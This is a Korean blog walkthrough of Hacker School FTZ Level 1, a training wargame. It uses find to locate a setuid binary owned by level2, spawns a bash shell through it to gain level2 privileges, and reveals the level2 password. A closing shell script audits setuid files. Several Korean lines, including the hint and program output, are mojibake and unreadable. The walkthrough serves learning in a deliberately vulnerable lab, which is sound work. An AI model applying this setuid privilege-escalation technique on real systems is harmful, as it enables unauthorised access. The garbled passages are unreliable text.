
[HackerSchool] Hacker School FTZ: Level1

선달 2022. 10. 5. 20:07

In the FTZ levels, the final goal is always to use the my-pass command to find the password for the next level.

To run my-pass for a level, you first have to obtain that level's privileges.


 

Log in as level1 (the password is also level1). If the login succeeds, you get a window like the one below.

If it does not appear, check that your setup is correct.

Xshell 7 (Build 0113)
Copyright (c) 2020 NetSarang Computer, Inc. All rights reserved.

Type `help' to learn how to use Xshell prompt.
[C:\~]$ 

Connecting to 192.168.176.128:22...
Connection established.
To escape to local shell, press 'Ctrl+Alt+]'.

WARNING! The remote SSH server rejected X11 forwarding request.
[level1@ftz level1]$

 

Let's look at the files in the current directory.

$ ls -a

[level1@ftz level1]$ ls -a
.   .bash_history  .bash_profile  .cshrc  .epems  .gvimrc  .muttrc   public_html  .viminfo  .Xauthority
..  .bash_logout   .bashrc        .emacs  .gtkrc  hint     .profile  tmp          .vimrc    .Xdefaults

 

 

From here on, every FTZ problem gives you its hint through cat hint.

It is a hint in name only: the hint file effectively contains the problem statement for the level, so don't hold back and use it freely!

$ cat hint

[level1@ftz level1]$ cat hint


level2 ๊ถŒํ•œ์— setuid๊ฐ€ ๊ฑธ๋ฆฐ ํŒŒ์ผ์„ ์ฐพ๋Š”๋‹ค.

 

 

The hint says to find a file that has setuid set with level2's privileges. Starting from the root directory (/), let's find (find) the files that have the setuid (4000) permission (-perm).

$ find / -perm 4000

[level1@ftz level1]$ find / -perm 4000
find: /lost+found: Permission denied
find: /boot/lost+found: Permission denied
find: /proc/1/fd: Permission denied
find: /proc/2/fd: Permission denied
...

 

 

๊ทผ๋ฐ ํŒŒ์ผ์ด ๊ฒ๋‚˜ ๋งŽ์ด ๋‚˜์˜จ๋‹ค...

์šฐ๋ฆฌ๋Š” ๋‹ค์Œ ๋‹จ๊ณ„์ธ Level2 ๋งŒ ์ฐพ์œผ๋ฉด ๋˜๋‹ˆ level2 ๋ผ๋Š” ์†Œ์œ ์ž (-user)๋ฅผ ๊ฐ€์ง„ ํŒŒ์ผ๋งŒ ์ฐพ์•„๋ณด์ž 

$ find / -user level2

[level1@ftz level1]$ find / -user level2
find: /lost+found: Permission denied
find: /boot/lost+found: Permission denied
find: /proc/1/fd: Permission denied
...
/bin/ExecuteMe
...
find: /home/trainer9: Permission denied

 

 

Again there is a lot of output, but.. we found a file we are allowed to access: /bin/ExecuteMe!

Move straight to that folder.

$ cd /bin

[level1@ftz level1]$ cd /bin
[level1@ftz bin]$ ls
arch        bash2  cpio   dnsdomainname  env        grep      kbd_mode  ls      mt             ping   rvi        sort   true           vi
ash         bsh    csh    doexec         ex         gtar      kill      mail    mv             ps     rview      stty   umount         view
ash.static  cat    cut    domainname     ExecuteMe  gunzip    level7    mkdir   my-pass        pwd    sed        su     uname          ypdomainname
autodig     chgrp  date   dumpkeys       false      gzip      link      mknod   netstat        red    setfont    sync   unicode_start  zcat
awk         chmod  dd     echo           fgrep      hostname  ln        mktemp  nice           rm     setserial  tar    unicode_stop
basename    chown  df     ed             gawk       igawk     loadkeys  more    nisdomainname  rmdir  sh         tcsh   unlink
bash        cp     dmesg  egrep          gettext    ipcalc    login     mount   pgawk          rpm    sleep      touch  usleep

 

 

Run that file. Right away!

$ ./ExecuteMe

[level1@ftz bin]$ ./ExecuteMe



		๋ ˆ๋ฒจ2์˜ ๊ถŒํ•œ์œผ๋กœ ๋‹น์‹ ์ด ์›ํ•˜๋Š” ๋ช…๋ น์–ด๋ฅผ
		ํ•œ๊ฐ€์ง€ ์‹คํ–‰์‹œ์ผœ ๋“œ๋ฆฌ๊ฒ ์Šต๋‹ˆ๋‹ค.
		(๋‹จ, my-pass ์™€ chmod๋Š” ์ œ์™ธ)

		์–ด๋–ค ๋ช…๋ น์„ ์‹คํ–‰์‹œํ‚ค๊ฒ ์Šต๋‹ˆ๊นŒ?
        
        [level2@ftz level2]$

 

๊ถŒํ•œ์€ ์–ป์—ˆ๋Š”๋ฐ ์ •์ž‘ ์ค‘์š”ํ•œ my-pass ๋Š” ์•ˆ๋œ๋‹จ๋‹ค..

๊ทธ๋Ÿผ my-pass ๋ผ๋Š” ๋ช…๋ น์–ด๋ฅผ ๋‚ด๋ฆด ์ˆ˜ ์žˆ๊ฒŒ ๋ช…๋ น์„ ๋‚ด๋ฆฌ์ž (!)

$ bash

[level2@ftz level2]$ bash


[level2@ftz level2]$

 

Now we can run commands as the user level2.

$ my-pass

[level2@ftz level2]$ my-pass

Level2 Password is "hacker or cracker".
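
As an added example (not part of the original post), the shell functions below turn the two find searches from this walkthrough into one audit for setuid files owned by a given account, without the Permission denied noise. The function names and the audit.sh file name are hypothetical; note that `-perm -4000` matches any file with the setuid bit set, while the `-perm 4000` form used above matches only a mode of exactly 4000.

```shell
#!/bin/sh
# Added example: audit a directory tree for setuid files.
# Function names are hypothetical, not from the original post.

# list_setuid ROOT [OWNER]
# Print every regular file under ROOT that has the setuid bit set.
# With OWNER (user name or numeric uid), keep only files owned by that account.
# "-perm -4000" means "at least the setuid bit", whatever the other mode bits are.
# "2>/dev/null" drops the "Permission denied" lines from unreadable directories.
list_setuid() {
    if [ -n "${2:-}" ]; then
        find "$1" -type f -perm -4000 -user "$2" -print 2>/dev/null | sort
    else
        find "$1" -type f -perm -4000 -print 2>/dev/null | sort
    fi
}

# list_exact_4000 ROOT
# The form used in the walkthrough, kept for comparison: "-perm 4000" without
# the leading dash matches only files whose mode is exactly 4000, so an
# ordinary setuid executable (for example mode 4755) is not reported.
list_exact_4000() {
    find "$1" -type f -perm 4000 -print 2>/dev/null | sort
}

# Run as: sh audit.sh /some/dir [owner]   (audit.sh is a hypothetical file name)
if [ "$#" -gt 0 ]; then
    list_setuid "$@"
fi
```

On a system you administer, a setuid file owned by an unprivileged account that hands its caller a command prompt, as ExecuteMe does here, is the kind of entry this listing is meant to surface for review.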

 

๋ฐ˜์‘ํ˜•